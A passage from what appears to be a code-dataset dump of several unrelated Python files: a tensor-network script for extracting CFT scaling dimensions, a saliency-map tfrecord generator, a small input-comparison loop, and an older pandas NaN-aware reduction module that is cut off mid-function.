ext | sha | content
---|---|---|
py | b40333e31e4894552565a247bd47adb1028ff94e | #!/usr/bin/python3
import numpy as np
import os
import sys
import modeldata
import tensordispenser
import initialtensors
import operator
import itertools
import warnings
import scaldim_plot
import toolbox
from tensors.tensor import Tensor
from tensorstorer import write_tensor_file, read_tensor_file
from scon_sparseeig import scon_sparseeig
from timer import Timer
from pathfinder import PathFinder
from custom_parser import parse_argv
from scon import scon
np.set_printoptions(precision=7)
np.set_printoptions(linewidth=100)
def get_id_pars(pars):
id_pars = dict()
mandatory_id_pars = {"model", "symmetry_tensors", "dtype",
"initial2x2", "initial4x4",
"n_normalization", "n_discard",
"block_width", "defect_angles", "KW",
"do_momenta", "do_eigenvectors", "n_dims_do"}
modelname = pars["model"].lower().strip()
if modelname == "ising":
mandatory_id_pars |= {"J", "H", "beta"}
elif modelname == "potts3":
mandatory_id_pars |= {"J", "beta"}
if pars["symmetry_tensors"]:
mandatory_id_pars |= {"qnums_do"}
if not pars["symmetry_tensors"]:
mandatory_id_pars |= {"sep_qnums"}
for k in mandatory_id_pars:
if k in pars:
id_pars[k] = pars[k]
else:
raise RuntimeError("The required parameter %s was not given."%k)
return id_pars
def parse():
pars = parse_argv(sys.argv,
# Format is: (name_of_argument, type, default)
("model", "str", ""),
("dtype", "dtype", np.complex_),
("J", "float", 1),
("H", "float", 0),
("initial2x2", "bool", False),
("initial4x4", "bool", False),
("n_dims_do", "int", 17),
("qnums_do", "int_list", []), #[] denotes all
("n_normalization", "int", 3),
("n_discard", "int", 0),
("block_width", "int", 8),
("defect_angles", "float_list", [0]),
("KW", "bool", False),
("do_eigenvectors", "bool", False),
("do_momenta", "bool", False),
("symmetry_tensors", "bool", False),
("sep_qnums", "bool", False),
# IO parameters.
("n_dims_plot", "int", 17),
("max_dim_plot", "float", 20000),
("qnums_plot", "int_list", []), #[] denotes all
("xtick_rotation", "int", 0),
("show_plots", "bool", True),
("save_plots", "bool", False),
("draw_exact_lines", "bool", True),
("draw_exact_circles", "bool", True),
("draw_defect_angle", "bool", True),
("plot_by_qnum", "bool", True),
("plot_by_momenta", "bool", False),
("plot_by_alpha", "bool", False),
("save_scaldim_file", "bool", True))
pars = vars(pars)
# - Format parameters -
pars["beta"] = modeldata.get_critical_beta(pars)
pars["J"] = pars["dtype"](pars["J"])
pars["H"] = pars["dtype"](pars["H"])
pars["defect_angles"] = sorted(pars["defect_angles"], key=abs)
if (not pars["symmetry_tensors"] and pars["sep_qnums"]
and not pars["do_eigenvectors"]):
raise ValueError("sep_qnums requires do_eigenvectors.")
if pars["defect_angles"] != [0] and pars["KW"]:
raise ValueError("Non-trivial defect_angles and KW.")
if pars["n_dims_plot"] > pars["n_dims_do"]:
raise ValueError("n_dims_plot > n_dims_do")
if not set(pars["qnums_plot"]).issubset(set(pars["qnums_do"])):
raise ValueError("qnums_plot is not included in qnums_do")
return pars
def get_defect(alpha, T, index):
# Build a group-like defect.
dim = T.shape[index]
try:
qim = T.qhape[index]
except TypeError:
qim = None
defect = type(T).eye(dim, qim=qim, dtype=T.dtype)
if alpha != 0:
for k,v in defect.sects.items():
phase = np.exp(1j*alpha*k[0])
defect[k] = v*phase
return defect
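# Build the bulk tensor for the model and normalize it: the logarithm of the
# partition function per site is estimated from repeated 2x2 coarse-grainings
# and a linear fit, and then divided out of the tensor.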
def get_T(pars):
# We always get the invariant tensor here, and cast it to the
# non-invariant one later if we so wish.
# This makes constructing the defects easier.
T = tensordispenser.get_tensor(pars, iter_count=0,
symmetry_tensors=True)[0]
log_fact = 0
Fs = []
Ns = []
cum = T
for i in range(1, pars["n_normalization"]):
cum = toolbox.contract2x2(cum)
log_fact *= 4
m = cum.abs().max()
if m != 0:
cum /= m
log_fact += np.log(m)
N = 4**i
F = np.log(scon(cum, [1,2,1,2]).value()) + log_fact
Fs.append(F)
Ns.append(N)
A, B = np.polyfit(Ns[pars["n_discard"]:], Fs[pars["n_discard"]:], 1)
T /= np.exp(A)
return T
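# The first tensor of the transfer-matrix row carries the defect: either the
# Kramers-Wannier duality defect, or a symmetry defect that multiplies each
# charge sector by the phase exp(1j*alpha*charge).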
def get_T_first(T, pars, alpha=0):
if pars["KW"]:
T_first = initialtensors.get_KW_tensor(pars)
elif pars["do_momenta"]:
defect_horz = get_defect(alpha, T, 0)
defect_vert = get_defect(alpha, T, 1).conjugate().transpose()
T_first = scon((T, defect_horz, defect_vert),
([1,-2,-3,4], [-1,1], [4,-4]))
else:
defect_horz = get_defect(alpha, T, 0)
T_first = scon((T, defect_horz), ([1,-2,-3,-4], [-1,1]))
return T_first
def qnums_from_eigenvectors(evects, pars):
sites = len(evects.shape) - 1
if pars["model"].strip().lower() == "ising":
symop = np.array([[1,0], [0,-1]], dtype=np.float_)
symop = type(evects).from_ndarray(symop)
else:
# TODO generalize symop to models other than Ising.
        raise NotImplementedError("Symmetry operators for models other than "
"Ising have not been implemented.")
ncon_list = (evects, evects.conjugate()) + (symop,)*sites
index_list = ((list(range(1,sites+1)) + [-1],
list(range(sites+1, 2*sites+1)) + [-2])
+ tuple([i+sites,i] for i in range(1,sites+1)))
qnums = scon(ncon_list, index_list)
qnums = qnums.diag()
# Round to the closest possible qnum for the given model.
pos_qnums = initialtensors.symmetry_classes_dims_qims[pars["model"]][2]
max_qnum = max(pos_qnums)
qnums = qnums.astype(np.complex_).log()*(max_qnum+1)/(2j*np.pi)
qnums = [min(pos_qnums, key=lambda x: abs(x-q)) for q in qnums]
return qnums
def separate_vector_by_qnum(v, qnums, pars):
# Get the right tensor type and the possible qnums for this model.
symdata = initialtensors.symmetry_classes_dims_qims[pars["model"]]
T, pos_qnums = symdata[0], symdata[2]
vals = {}
for q in pos_qnums:
vals[q] = []
for s, q in zip(v, qnums):
vals[q].append(s)
dim = [len(vals[q]) for q in pos_qnums]
tensor = T.empty(shape=(dim,), qhape=(pos_qnums,), dirs=[1], invar=False)
for q in pos_qnums:
block = np.array(vals[q])
tensor[(q,)] = block
print(tensor)
return tensor
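# Diagonalize a periodic row of block_width tensors, with the defect inserted
# in the first slot, and turn the leading eigenvalues of this transfer matrix
# into the central charge, scaling dimensions and (optionally) momenta.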
def get_cft_data(pars):
T = get_T(pars)
scaldims_by_alpha = {}
if pars["do_momenta"]:
momenta_by_alpha = {}
if pars["do_eigenvectors"]:
evects_by_alpha = {}
for alpha in pars["defect_angles"]:
print("Building the matrix to diagonalize.")
T_first = get_T_first(T, pars, alpha=alpha)
# Get the eigenvalues and their logarithms.
block_width = pars["block_width"]
n_dims_do = pars["n_dims_do"]
if pars["do_momenta"]:
translation = list(range(1, block_width)) + [0]
else:
translation = range(block_width)
scon_list = [T_first] + [T]*(block_width-1)
index_list = [[block_width*2, -101, 2, -1]]
for i in range(2, block_width+1):
index_list += [[2*i-2, -100-i, 2*i, -(2*i-1)]]
if pars["KW"] and pars["do_momenta"]:
U = initialtensors.get_KW_unitary(pars)
scon_list += [U]
for l in index_list:
l[0] += 2
l[2] += 2
l[3] += -2
index_list[0][3] *= -1
index_list[1][3] *= -1
U_indices = [3,5,-1,-2]
index_list.append(U_indices)
if not pars["symmetry_tensors"]:
# Cast to non-invariant tensors.
scon_list = [Tensor.from_ndarray(T.to_ndarray())
for T in scon_list]
hermitian = not pars["do_momenta"]
res = scon_sparseeig(scon_list, index_list, translation,
range(block_width), hermitian=hermitian,
return_eigenvectors=pars["do_eigenvectors"],
qnums_do=pars["qnums_do"],
maxiter=500, tol=1e-8, k=pars["n_dims_do"])
if pars["do_eigenvectors"]:
es, evects = res
else:
es = res
# Convert es to complex for taking the log.
es = es.astype(np.complex_, copy=False)
# Log and scale the eigenvalues.
block_width = pars["block_width"]
if pars["KW"]:
block_width -= 0.5
log_es = es.log() * block_width / (2*np.pi)
# Extract the central charge.
if alpha == 0:
if pars["KW"]:
c = (log_es.real().max() + 0.0625) * 12
else:
c = log_es.real().max() * 12
try:
log_es -= c/12
except NameError:
raise ValueError("Need to provide 0 in defect_angles to be able "
"to obtain the central charge.")
log_es *= -1
scaldims = log_es.real()
if (not pars["symmetry_tensors"]) and pars["sep_qnums"]:
qnums = qnums_from_eigenvectors(evects, pars)
scaldims = separate_vector_by_qnum(scaldims, qnums, pars)
scaldims_by_alpha[alpha] = scaldims
if pars["do_momenta"]:
momenta = log_es.imag()
if (not pars["symmetry_tensors"]) and pars["sep_qnums"]:
momenta = separate_vector_by_qnum(momenta, qnums, pars)
momenta_by_alpha[alpha] = momenta
if pars["do_eigenvectors"]:
evects_by_alpha[alpha] = evects
ret_val = (scaldims_by_alpha, c)
if pars["do_momenta"]:
ret_val += (momenta_by_alpha,)
if pars["do_eigenvectors"]:
ret_val += (evects_by_alpha,)
return ret_val
def load_cft_data(pars, **kwargs):
if kwargs:
pars = pars.copy()
pars.update(kwargs)
id_pars = get_id_pars(pars)
filename = os.path.basename(__file__)
try:
res = read_tensor_file("scals_by_alpha", pars=id_pars,
filename=filename)
except RuntimeError:
print("Constructing scaling dimensions.")
timer = Timer()
timer.start()
res = get_cft_data(pars)
print("Done constructing scaling dimensions.\n")
timer.print_elapsed()
if pars["save_scaldim_file"]:
write_tensor_file(data=res, prefix="scals_by_alpha",
pars=id_pars, filename=filename)
return res
#=============================================================================#
if __name__ == "__main__":
pars = parse()
id_pars = get_id_pars(pars)
filename = os.path.basename(__file__)
pather = PathFinder(filename, id_pars)
# - Infoprint -
print("\n" + ("="*70) + "\n")
print("Running %s with the following parameters:"%filename)
for k,v in sorted(pars.items()):
print("%s = %s"%(k, v))
res = load_cft_data(pars)
scaldims_by_alpha, c = res[:2]
if pars["do_momenta"]:
momenta_by_alpha = res[2]
else:
momenta_by_alpha = None
scaldim_plot.plot_and_print_dict(scaldims_by_alpha, c, pars, pather,
momenta_dict=momenta_by_alpha,
id_pars=id_pars)
|
py | b40334041f68239ea2cadbee89d384237af7d64b | from . import vsum_tool
from .DatasetBuilder import DatasetBuilder
from .BaseVideo import BaseVideo
from .SumMeVideo import SumMeVideo
from .TVSumVideo import TVSumVideo
from .VSUMMVideo import VSUMMVideo
|
py | b403345efc441e2c6eafb806833a9b7bca128ea4 | # coding=utf-8
# Copyright 2022 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
r"""This script allows generation of tfrecords.
"""
import os
from absl import app
from absl import flags
import numpy as np
from scipy import ndimage
from six.moves import range
import tensorflow.compat.v1 as tf
from interpretability_benchmark.saliency_data_gen.data_helper import DataIterator
from interpretability_benchmark.saliency_data_gen.data_helper import image_to_tfexample
from interpretability_benchmark.saliency_data_gen.data_helper import SALIENCY_BASELINE
from interpretability_benchmark.saliency_data_gen.saliency_helper import generate_saliency_image
from interpretability_benchmark.saliency_data_gen.saliency_helper import get_saliency_image
from interpretability_benchmark.utils import resnet_model
tf.disable_v2_behavior()
flags.DEFINE_string('master', '', 'Name of the TensorFlow master to use.')
flags.DEFINE_string('output_dir', '/tmp/saliency/',
'output directory for tfrecords')
flags.DEFINE_string('data_path', '', 'Pathway to the input tfrecord dataset.')
flags.DEFINE_string('ckpt_path', '', 'Pathway to the trained checkpoint.')
flags.DEFINE_enum(
'split', 'validation', ('training', 'validation'),
'Specifies whether to create saliency maps for'
'training or test set.')
flags.DEFINE_enum('dataset_name', 'imagenet',
('food_101', 'imagenet', 'birdsnap'),
'What dataset is the model trained on.')
flags.DEFINE_enum('saliency_method', 'SH_SG',
('SH_SG', 'IG_SG', 'GB_SG', 'SH_SG_2', 'IG_SG_2', 'GB_SG_2',
'GB', 'IG', 'SH', 'SOBEL'),
'saliency method dataset to produce.')
flags.DEFINE_bool('test_small_sample', True,
'Boolean for whether to test internally.')
FLAGS = flags.FLAGS
MEAN_RGB = [0.485 * 255, 0.456 * 255, 0.406 * 255]
STDDEV_RGB = [0.229 * 255, 0.224 * 255, 0.225 * 255]
N_CLASSES = {'imagenet': 1000, 'food_101': 101, 'birdsnap': 500}
class ProcessSaliencyMaps(object):
"""Helper class that provides TensorFlow image coding utilities."""
def __init__(self, dataset_name, saliency_method, ckpt_directory,
num_label_classes):
# Create a single Session to run all image coding calls.
self._dataset_name = dataset_name
self._saliency_method = saliency_method
self._ckpt_directory = ckpt_directory
self._num_label_classes = num_label_classes
def produce_saliency_map(self, data_path, writer):
"""produces a saliency map."""
self._dataset = DataIterator(
data_path,
self._dataset_name,
preprocessing=False,
test_small_sample=FLAGS.test_small_sample)
self._graph = tf.Graph()
with self._graph.as_default():
image_raw, image_processed, label = self._dataset.input_fn()
image_processed -= tf.constant(
MEAN_RGB, shape=[1, 1, 3], dtype=image_processed.dtype)
image_processed /= tf.constant(
STDDEV_RGB, shape=[1, 1, 3], dtype=image_processed.dtype)
network = resnet_model.resnet_50(
num_classes=self._num_label_classes,
data_format='channels_last',
)
logits = network(inputs=image_processed, is_training=False)
prediction = tf.cast(tf.argmax(logits, axis=1), tf.int32)
self._neuron_selector = tf.placeholder(tf.int32)
y = logits[0][self._neuron_selector]
self._sess = tf.Session(graph=self._graph)
saver = tf.train.Saver()
saver.restore(self._sess, self._ckpt_directory)
self._gradient_placeholder = get_saliency_image(
self._graph, self._sess, y, image_processed, 'gradient')
self._back_prop_placeholder = get_saliency_image(
self._graph, self._sess, y, image_processed, 'guided_backprop')
self._integrated_gradient_placeholder = get_saliency_image(
self._graph, self._sess, y, image_processed, 'integrated_gradients')
baseline = SALIENCY_BASELINE['resnet_50']
self._coord = tf.train.Coordinator()
threads = tf.train.start_queue_runners(sess=self._sess, coord=self._coord)
example_count = 0
try:
while True:
img_out, raw_img_out, label_out, prediction_out = self._sess.run(
[image_processed, image_raw, label, prediction])
if img_out.shape[3] == 3:
img_out = np.squeeze(img_out)
feed_dict = {self._neuron_selector: prediction_out[0]}
if self._saliency_method != 'SOBEL':
saliency_map = generate_saliency_image(
self._saliency_method, img_out, feed_dict,
self._gradient_placeholder, self._back_prop_placeholder,
self._integrated_gradient_placeholder, baseline)
else:
saliency_map = ndimage.sobel(img_out, axis=0)
saliency_map = saliency_map.astype(np.float32)
saliency_map = np.reshape(saliency_map, [-1])
example = image_to_tfexample(
raw_image=raw_img_out[0], maps=saliency_map, label=label_out)
writer.write(example.SerializeToString())
example_count += 1
if FLAGS.test_small_sample:
if example_count == 2:
break
except tf.errors.OutOfRangeError:
print('Finished number of images:', example_count)
finally:
self._coord.request_stop()
self._coord.join(threads)
writer.close()
def generate_dataset(data_directory, dataset_name, num_shards, output_directory,
ckpt_directory, num_label_classes, filenames,
saliency_method):
"""Generate a dataset."""
data_gen = ProcessSaliencyMaps(
dataset_name=dataset_name,
ckpt_directory=ckpt_directory,
num_label_classes=num_label_classes,
saliency_method=saliency_method)
counter = 0
for i in range(num_shards):
filename = filenames[i]
data_path = data_directory + filename
output_file = os.path.join(output_directory, filename)
writer = tf.python_io.TFRecordWriter(output_file)
_ = data_gen.produce_saliency_map(data_path, writer)
counter += 1
print('Finished shard number:', counter)
print('Finished outputting all records to the directory.')
def main(argv):
del argv # Unused.
if FLAGS.test_small_sample:
filenames = ['test_small_sample']
num_shards = 1
output_dir = FLAGS.output_dir
else:
output_dir = ('%s/%s/%s/%s' % (FLAGS.output_dir, FLAGS.dataset_name,
'resnet_50', FLAGS.saliency_method))
filenames = tf.gfile.ListDirectory(FLAGS.data_path)
num_shards = len(filenames)
generate_dataset(
data_directory=FLAGS.data_path,
output_directory=output_dir,
num_shards=num_shards,
dataset_name=FLAGS.dataset_name,
        ckpt_directory=FLAGS.ckpt_path,
num_label_classes=N_CLASSES[FLAGS.dataset_name],
filenames=filenames,
saliency_method=FLAGS.saliency_method)
if __name__ == '__main__':
app.run(main)
|
py | b40334657f18c2e51ad6b521045e0b5db6b96b4e | # -*- coding: utf-8 -*-
while (True):
X, Y = map(int, input().split())
if (X == Y):
break
print("Crescente" if (X < Y) else "Decrescente") |
py | b40334c1857ac02aa08a3de887773e6f8b6a8aa7 | from pandas import compat
import sys
import itertools
import functools
import numpy as np
from pandas.core.common import isnull, notnull, _values_from_object, is_float
import pandas.core.common as com
import pandas.lib as lib
import pandas.algos as algos
import pandas.hashtable as _hash
import pandas.tslib as tslib
from pandas.compat import builtins
try:
import bottleneck as bn
_USE_BOTTLENECK = True
except ImportError: # pragma: no cover
_USE_BOTTLENECK = False
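# Decorator that forbids running a reduction on arrays whose dtype is in the
# given blacklist (used below to keep datetime64 data out of sums, means etc.).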
class disallow(object):
def __init__(self, *dtypes):
super(disallow, self).__init__()
self.dtypes = tuple(np.dtype(dtype).type for dtype in dtypes)
def check(self, obj):
return hasattr(obj, 'dtype') and issubclass(obj.dtype.type,
self.dtypes)
def __call__(self, f):
@functools.wraps(f)
def _f(*args, **kwargs):
obj_iter = itertools.chain(args, compat.itervalues(kwargs))
if any(self.check(obj) for obj in obj_iter):
raise TypeError('reduction operation {0!r} not allowed for '
'this dtype'.format(f.__name__.replace('nan',
'')))
return f(*args, **kwargs)
return _f
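# Decorator that dispatches to the bottleneck implementation of a reduction
# when it is installed and safe for the dtype, and falls back to the plain
# implementation otherwise (or when bottleneck produces inf/-inf).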
class bottleneck_switch(object):
def __init__(self, zero_value=None, **kwargs):
self.zero_value = zero_value
self.kwargs = kwargs
def __call__(self, alt):
bn_name = alt.__name__
try:
bn_func = getattr(bn, bn_name)
except (AttributeError, NameError): # pragma: no cover
bn_func = None
@functools.wraps(alt)
def f(values, axis=None, skipna=True, **kwds):
if len(self.kwargs) > 0:
for k, v in compat.iteritems(self.kwargs):
if k not in kwds:
kwds[k] = v
try:
if self.zero_value is not None and values.size == 0:
if values.ndim == 1:
return 0
else:
result_shape = (values.shape[:axis] +
values.shape[axis + 1:])
result = np.empty(result_shape)
result.fill(0)
return result
if _USE_BOTTLENECK and skipna and _bn_ok_dtype(values.dtype, bn_name):
result = bn_func(values, axis=axis, **kwds)
# prefer to treat inf/-inf as NA, but must compute the func
# twice :(
if _has_infs(result):
result = alt(values, axis=axis, skipna=skipna, **kwds)
else:
result = alt(values, axis=axis, skipna=skipna, **kwds)
except Exception:
result = alt(values, axis=axis, skipna=skipna, **kwds)
return result
return f
def _bn_ok_dtype(dt, name):
# Bottleneck chokes on datetime64
if dt != np.object_ and not issubclass(dt.type, (np.datetime64, np.timedelta64)):
# bottleneck does not properly upcast during the sum
# so can overflow
if name == 'nansum':
if dt.itemsize < 8:
return False
return True
return False
def _has_infs(result):
if isinstance(result, np.ndarray):
if result.dtype == 'f8':
return lib.has_infs_f8(result)
elif result.dtype == 'f4':
return lib.has_infs_f4(result)
return False
return np.isinf(result) or np.isneginf(result)
def _get_fill_value(dtype, fill_value=None, fill_value_typ=None):
""" return the correct fill value for the dtype of the values """
if fill_value is not None:
return fill_value
if _na_ok_dtype(dtype):
if fill_value_typ is None:
return np.nan
else:
if fill_value_typ == '+inf':
return np.inf
else:
return -np.inf
else:
if fill_value_typ is None:
return tslib.iNaT
else:
if fill_value_typ == '+inf':
# need the max int here
return np.iinfo(np.int64).max
else:
return tslib.iNaT
def _get_values(values, skipna, fill_value=None, fill_value_typ=None,
isfinite=False, copy=True):
""" utility to get the values view, mask, dtype
if necessary copy and mask using the specified fill_value
copy = True will force the copy """
values = _values_from_object(values)
if isfinite:
mask = _isfinite(values)
else:
mask = isnull(values)
dtype = values.dtype
dtype_ok = _na_ok_dtype(dtype)
# get our fill value (in case we need to provide an alternative
# dtype for it)
fill_value = _get_fill_value(dtype, fill_value=fill_value,
fill_value_typ=fill_value_typ)
if skipna:
if copy:
values = values.copy()
if dtype_ok:
np.putmask(values, mask, fill_value)
# promote if needed
else:
values, changed = com._maybe_upcast_putmask(values, mask,
fill_value)
elif copy:
values = values.copy()
values = _view_if_needed(values)
# return a platform independent precision dtype
dtype_max = dtype
if dtype.kind == 'i' and not issubclass(
dtype.type, (np.bool, np.datetime64, np.timedelta64)):
dtype_max = np.int64
elif dtype.kind in ['b'] or issubclass(dtype.type, np.bool):
dtype_max = np.int64
elif dtype.kind in ['f']:
dtype_max = np.float64
return values, mask, dtype, dtype_max
def _isfinite(values):
if issubclass(values.dtype.type, (np.timedelta64, np.datetime64)):
return isnull(values)
elif isinstance(values.dtype, object):
return ~np.isfinite(values.astype('float64'))
return ~np.isfinite(values)
def _na_ok_dtype(dtype):
return not issubclass(dtype.type, (np.integer, np.datetime64,
np.timedelta64))
def _view_if_needed(values):
if issubclass(values.dtype.type, (np.datetime64, np.timedelta64)):
return values.view(np.int64)
return values
def _wrap_results(result, dtype):
""" wrap our results if needed """
if issubclass(dtype.type, np.datetime64):
if not isinstance(result, np.ndarray):
result = lib.Timestamp(result)
else:
result = result.view(dtype)
elif issubclass(dtype.type, np.timedelta64):
if not isinstance(result, np.ndarray):
# this is a scalar timedelta result!
# we have series convert then take the element (scalar)
# as series will do the right thing in py3 (and deal with numpy
# 1.6.2 bug in that it results dtype of timedelta64[us]
from pandas import Series
# coerce float to results
if is_float(result):
result = int(result)
result = Series([result], dtype='timedelta64[ns]')
else:
result = result.view(dtype)
return result
def nanany(values, axis=None, skipna=True):
values, mask, dtype, _ = _get_values(values, skipna, False, copy=skipna)
return values.any(axis)
def nanall(values, axis=None, skipna=True):
values, mask, dtype, _ = _get_values(values, skipna, True, copy=skipna)
return values.all(axis)
@disallow('M8')
@bottleneck_switch(zero_value=0)
def nansum(values, axis=None, skipna=True):
values, mask, dtype, dtype_max = _get_values(values, skipna, 0)
the_sum = values.sum(axis,dtype=dtype_max)
the_sum = _maybe_null_out(the_sum, axis, mask)
return _wrap_results(the_sum, dtype)
@disallow('M8')
@bottleneck_switch()
def nanmean(values, axis=None, skipna=True):
values, mask, dtype, dtype_max = _get_values(values, skipna, 0)
the_sum = _ensure_numeric(values.sum(axis, dtype=dtype_max))
count = _get_counts(mask, axis)
if axis is not None:
the_mean = the_sum / count
ct_mask = count == 0
if ct_mask.any():
the_mean[ct_mask] = np.nan
else:
the_mean = the_sum / count if count > 0 else np.nan
return _wrap_results(the_mean, dtype)
@disallow('M8')
@bottleneck_switch()
def nanmedian(values, axis=None, skipna=True):
values, mask, dtype, dtype_max = _get_values(values, skipna)
def get_median(x):
mask = notnull(x)
if not skipna and not mask.all():
return np.nan
return algos.median(_values_from_object(x[mask]))
if values.dtype != np.float64:
values = values.astype('f8')
notempty = values.size
# an array from a frame
if values.ndim > 1:
# there's a non-empty array to apply over otherwise numpy raises
if notempty:
return np.apply_along_axis(get_median, axis, values)
# must return the correct shape, but median is not defined for the
# empty set so return nans of shape "everything but the passed axis"
# since "axis" is where the reduction would occur if we had a nonempty
# array
shp = np.array(values.shape)
dims = np.arange(values.ndim)
ret = np.empty(shp[dims != axis])
ret.fill(np.nan)
return ret
# otherwise return a scalar value
return _wrap_results(get_median(values), dtype) if notempty else np.nan
def _get_counts_nanvar(mask, axis, ddof):
count = _get_counts(mask, axis)
d = count-ddof
# always return NaN, never inf
if np.isscalar(count):
if count <= ddof:
count = np.nan
d = np.nan
else:
mask2 = count <= ddof
if mask2.any():
np.putmask(d, mask2, np.nan)
np.putmask(count, mask2, np.nan)
return count, d
@disallow('M8')
@bottleneck_switch(ddof=1)
def nanvar(values, axis=None, skipna=True, ddof=1):
    if not issubclass(values.dtype.type, np.floating):
values = values.astype('f8')
mask = isnull(values)
count, d = _get_counts_nanvar(mask, axis, ddof)
if skipna:
values = values.copy()
np.putmask(values, mask, 0)
X = _ensure_numeric(values.sum(axis))
XX = _ensure_numeric((values ** 2).sum(axis))
return np.fabs((XX - X ** 2 / count) / d)
def nansem(values, axis=None, skipna=True, ddof=1):
var = nanvar(values, axis, skipna, ddof=ddof)
    if not issubclass(values.dtype.type, np.floating):
values = values.astype('f8')
mask = isnull(values)
count, _ = _get_counts_nanvar(mask, axis, ddof)
return np.sqrt(var)/np.sqrt(count)
@bottleneck_switch()
def nanmin(values, axis=None, skipna=True):
values, mask, dtype, dtype_max = _get_values(values, skipna, fill_value_typ='+inf')
# numpy 1.6.1 workaround in Python 3.x
if (values.dtype == np.object_ and compat.PY3):
if values.ndim > 1:
apply_ax = axis if axis is not None else 0
result = np.apply_along_axis(builtins.min, apply_ax, values)
else:
try:
result = builtins.min(values)
except:
result = np.nan
else:
if ((axis is not None and values.shape[axis] == 0)
or values.size == 0):
try:
result = com.ensure_float(values.sum(axis,dtype=dtype_max))
result.fill(np.nan)
except:
result = np.nan
else:
result = values.min(axis)
result = _wrap_results(result, dtype)
return _maybe_null_out(result, axis, mask)
@bottleneck_switch()
def nanmax(values, axis=None, skipna=True):
values, mask, dtype, dtype_max = _get_values(values, skipna, fill_value_typ='-inf')
# numpy 1.6.1 workaround in Python 3.x
if (values.dtype == np.object_ and compat.PY3):
if values.ndim > 1:
apply_ax = axis if axis is not None else 0
result = np.apply_along_axis(builtins.max, apply_ax, values)
else:
try:
result = builtins.max(values)
except:
result = np.nan
else:
if ((axis is not None and values.shape[axis] == 0)
or values.size == 0):
try:
result = com.ensure_float(values.sum(axis, dtype=dtype_max))
result.fill(np.nan)
except:
result = np.nan
else:
result = values.max(axis)
result = _wrap_results(result, dtype)
return _maybe_null_out(result, axis, mask)
def nanargmax(values, axis=None, skipna=True):
"""
Returns -1 in the NA case
"""
values, mask, dtype, _ = _get_values(values, skipna, fill_value_typ='-inf',
isfinite=True)
result = values.argmax(axis)
result = _maybe_arg_null_out(result, axis, mask, skipna)
return result
def nanargmin(values, axis=None, skipna=True):
"""
Returns -1 in the NA case
"""
values, mask, dtype, _ = _get_values(values, skipna, fill_value_typ='+inf',
isfinite=True)
result = values.argmin(axis)
result = _maybe_arg_null_out(result, axis, mask, skipna)
return result
@disallow('M8')
def nanskew(values, axis=None, skipna=True):
    if not issubclass(values.dtype.type, np.floating):
values = values.astype('f8')
mask = isnull(values)
count = _get_counts(mask, axis)
if skipna:
values = values.copy()
np.putmask(values, mask, 0)
A = values.sum(axis) / count
B = (values ** 2).sum(axis) / count - A ** 2
C = (values ** 3).sum(axis) / count - A ** 3 - 3 * A * B
# floating point error
B = _zero_out_fperr(B)
C = _zero_out_fperr(C)
result = ((np.sqrt((count ** 2 - count)) * C) /
((count - 2) * np.sqrt(B) ** 3))
if isinstance(result, np.ndarray):
result = np.where(B == 0, 0, result)
result[count < 3] = np.nan
return result
else:
result = 0 if B == 0 else result
if count < 3:
return np.nan
return result
@disallow('M8')
def nankurt(values, axis=None, skipna=True):
    if not issubclass(values.dtype.type, np.floating):
values = values.astype('f8')
mask = isnull(values)
count = _get_counts(mask, axis)
if skipna:
values = values.copy()
np.putmask(values, mask, 0)
A = values.sum(axis) / count
B = (values ** 2).sum(axis) / count - A ** 2
C = (values ** 3).sum(axis) / count - A ** 3 - 3 * A * B
D = (values ** 4).sum(axis) / count - A ** 4 - 6 * B * A * A - 4 * C * A
B = _zero_out_fperr(B)
C = _zero_out_fperr(C)
D = _zero_out_fperr(D)
result = (((count * count - 1.) * D / (B * B) - 3 * ((count - 1.) ** 2)) /
((count - 2.) * (count - 3.)))
if isinstance(result, np.ndarray):
result = np.where(B == 0, 0, result)
result[count < 4] = np.nan
return result
else:
result = 0 if B == 0 else result
if count < 4:
return np.nan
return result
@disallow('M8')
def nanprod(values, axis=None, skipna=True):
mask = isnull(values)
if skipna and not issubclass(values.dtype.type, np.integer):
values = values.copy()
values[mask] = 1
result = values.prod(axis)
return _maybe_null_out(result, axis, mask)
def _maybe_arg_null_out(result, axis, mask, skipna):
# helper function for nanargmin/nanargmax
if axis is None:
if skipna:
if mask.all():
result = -1
else:
if mask.any():
result = -1
else:
if skipna:
na_mask = mask.all(axis)
else:
na_mask = mask.any(axis)
if na_mask.any():
result[na_mask] = -1
return result
def _get_counts(mask, axis):
if axis is not None:
count = (mask.shape[axis] - mask.sum(axis)).astype(float)
else:
count = float(mask.size - mask.sum())
return count
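# Set the result to NaN wherever the reduction was taken over nothing but
# missing values.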
def _maybe_null_out(result, axis, mask):
if axis is not None:
null_mask = (mask.shape[axis] - mask.sum(axis)) == 0
if null_mask.any():
result = result.astype('f8')
result[null_mask] = np.nan
else:
null_mask = mask.size - mask.sum()
if null_mask == 0:
result = np.nan
return result
def _zero_out_fperr(arg):
if isinstance(arg, np.ndarray):
return np.where(np.abs(arg) < 1e-14, 0, arg)
else:
return 0 if np.abs(arg) < 1e-14 else arg
@disallow('M8')
def nancorr(a, b, method='pearson', min_periods=None):
"""
a, b: ndarrays
"""
if len(a) != len(b):
raise AssertionError('Operands to nancorr must have same size')
if min_periods is None:
min_periods = 1
valid = notnull(a) & notnull(b)
if not valid.all():
a = a[valid]
b = b[valid]
if len(a) < min_periods:
return np.nan
f = get_corr_func(method)
return f(a, b)
def get_corr_func(method):
if method in ['kendall', 'spearman']:
from scipy.stats import kendalltau, spearmanr
def _pearson(a, b):
return np.corrcoef(a, b)[0, 1]
def _kendall(a, b):
rs = kendalltau(a, b)
if isinstance(rs, tuple):
return rs[0]
return rs
def _spearman(a, b):
return spearmanr(a, b)[0]
_cor_methods = {
'pearson': _pearson,
'kendall': _kendall,
'spearman': _spearman
}
return _cor_methods[method]
@disallow('M8')
def nancov(a, b, min_periods=None):
if len(a) != len(b):
raise AssertionError('Operands to nancov must have same size')
if min_periods is None:
min_periods = 1
valid = notnull(a) & notnull(b)
if not valid.all():
a = a[valid]
b = b[valid]
if len(a) < min_periods:
return np.nan
return np.cov(a, b)[0, 1]
def _ensure_numeric(x):
if isinstance(x, np.ndarray):
if x.dtype == np.object_:
x = x.astype(np.float64)
